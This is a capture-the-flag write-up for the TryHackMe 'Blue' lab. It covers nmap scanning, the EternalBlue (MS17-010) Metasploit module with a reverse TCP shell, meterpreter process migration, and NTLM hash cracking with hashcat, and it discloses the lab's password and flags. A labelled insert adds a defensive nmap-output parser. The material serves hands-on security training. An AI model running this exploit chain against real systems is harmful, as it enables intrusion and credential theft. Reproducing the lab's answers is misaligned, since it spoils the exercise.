TryHackMe: Blue write-up
--
Hope you are doing well, so let's get started with the Blue machine on TryHackMe.
Before we start the machine, let's make sure we are connected to the TryHackMe VPN. To do so, head over to the access link and download the configuration file. Once the file is downloaded, open a terminal and connect using openvpn as follows:
sudo openvpn vpnfile.ovpn
Once we are connected, we can proceed with the tasks.
Task 1
First we start the machine.
To scan the machine we run the following nmap command (note the double dash before script):
nmap -sV -vv --script vuln TARGET_IP
We see that the following ports are open:
135, 139, 445, 3389, 49152, 49153, 49154, 49158, 49159
As we can see, there are 3 ports open under 1000.
In the nmap output we see that the machine is vulnerable to ms17-010:
smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
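As an added example (not part of the original write-up), here is a small Python parser for the nmap vuln-script output format shown above, the kind of thing a defender uses to turn scan output into a triage list of hosts that still need the MS17-010 patch. The sample input is constructed from the block quoted above, with a second one-line script result added to show the non-vulnerable case; the function names are my own.

```python
import re
from typing import Dict, List

# Constructed sample input, modelled on the nmap output quoted in the write-up
# (nmap's normal-output format: script lines start with "|", the last one with "|_").
# The second, one-line script result is added to show a non-vulnerable finding.
SAMPLE_OUTPUT = """\
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|_    Disclosure date: 2017-03-14
|_smb-vuln-ms10-054: false
"""

# Key/value lines that nmap's vulns library prints for a finding (lower-cased keys).
KNOWN_FIELDS = {"state", "ids", "risk factor", "disclosure date"}
# Script names are lower-case with hyphens; finding fields start with a capital letter.
SCRIPT_RE = re.compile(r"^([a-z][a-z0-9-]*):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_host_scripts(text: str) -> Dict[str, dict]:
    """Turn nmap's "| script-name:" blocks into {script_name: fields}."""
    scripts: Dict[str, dict] = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                                  # port table, headers, etc.
        body = raw.lstrip("|_").strip()               # drop the "|" / "|_" prefix
        start = SCRIPT_RE.match(body)
        if start:                                     # new script block
            current = start.group(1)
            scripts[current] = {"description": [], "cves": []}
            if start.group(2):                        # one-line result, e.g. "false"
                scripts[current]["result"] = start.group(2)
            continue
        if current is None or not body:
            continue
        key, sep, value = body.partition(":")
        key = key.strip().lower()
        if sep and key in KNOWN_FIELDS:
            scripts[current][key] = value.strip()
            if key == "ids":
                scripts[current]["cves"] = CVE_RE.findall(value)
        elif sep and not value.strip():
            continue                                  # section marker such as "VULNERABLE:"
        else:
            scripts[current]["description"].append(body)
    return scripts


def flagged_findings(scripts: Dict[str, dict]) -> List[dict]:
    """Findings whose State is VULNERABLE, i.e. hosts that still need the patch."""
    flagged = []
    for name, fields in sorted(scripts.items()):
        if fields.get("state", "").upper() == "VULNERABLE":
            flagged.append({
                "script": name,
                "cves": fields["cves"],
                "risk": fields.get("risk factor", "UNKNOWN"),
                "disclosed": fields.get("disclosure date"),
            })
    return flagged


if __name__ == "__main__":
    for f in flagged_findings(parse_host_scripts(SAMPLE_OUTPUT)):
        print(f"{f['script']}: {', '.join(f['cves'])} (risk {f['risk']}, disclosed {f['disclosed']})")
```

Run it against a saved `nmap -oN` file instead of the constructed sample to get the same list for a real scan; only findings whose State is VULNERABLE are returned, so a script that prints "false" does not end up in the queue.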
Task 2
We start metasploit with the command
msfconsole
We search the metasploit database for ms17_010:
msf6 > search ms17_010
Metasploit returns the name of the exploit:
exploit/windows/smb/ms17_010_eternalblue
To use the exploit, select it by running use <number>, where number is the index metasploit printed next to the exploit in the search results:
msf6 > use 0
Once we have the exploit selected, we can display its options by running
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Now we have to set rhosts to the target's IP address:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.90.60
Since we are accessing the machine over the VPN, we also have to set lhost to the VPN interface so that the reverse shell connects back through the tunnel:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0
To set the payload:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
Once all options are set, we execute the exploit:
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
After some time you should have a shell. If the exploit fails, stop all jobs by executing
msf6 exploit(windows/smb/ms17_010_eternalblue) > jobs -K
and try running the exploit again. If the exploit fails again, try rebooting the target machine and change the rhosts value to the new IP address.
Once you have the shell, we can background it by typing background and then y. Now, to upgrade the shell to a meterpreter shell, we can use the following module:
Task 3
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
To use this module we set the session to the number of the backgrounded shell as follows
set session 2
and then
run
After trying multiple times I was not able to get a meterpreter shell, and the only solution was to use windows/smb/ms17_010_eternalblue without setting the payload.
As we can see, we have got a meterpreter shell.
To list all processes we run
ps
We note down the process ID of a process whose user is NT AUTHORITY\SYSTEM.
It's best to use winlogon.exe as it will have the most permissions.
Task 4
Once we have migrated to another process we can run the following.
Now we can crack the hash using hashcat. To do this, we copy the hashes and store them in a file (hashes); mode 1000 is hashcat's NTLM mode.
To run hashcat:
hashcat -m 1000 hashes /usr/share/wordlists/rockyou.txt
Once the hash is cracked we can see the password with
hashcat -m 1000 hashes /usr/share/wordlists/rockyou.txt --show
We see that the password is alqfna22.
Task 5
We can see that the first flag is at location C:\
flag 1: flag{access_the_machine}
To find flag 2 we head over to the configuration file where the password hashes are stored.
flag 2: flag{sam_database_elevated_access}
To find flag 3 we head over to Jon's Documents folder.
flag 3: flag{admin_documents_can_be_valuable}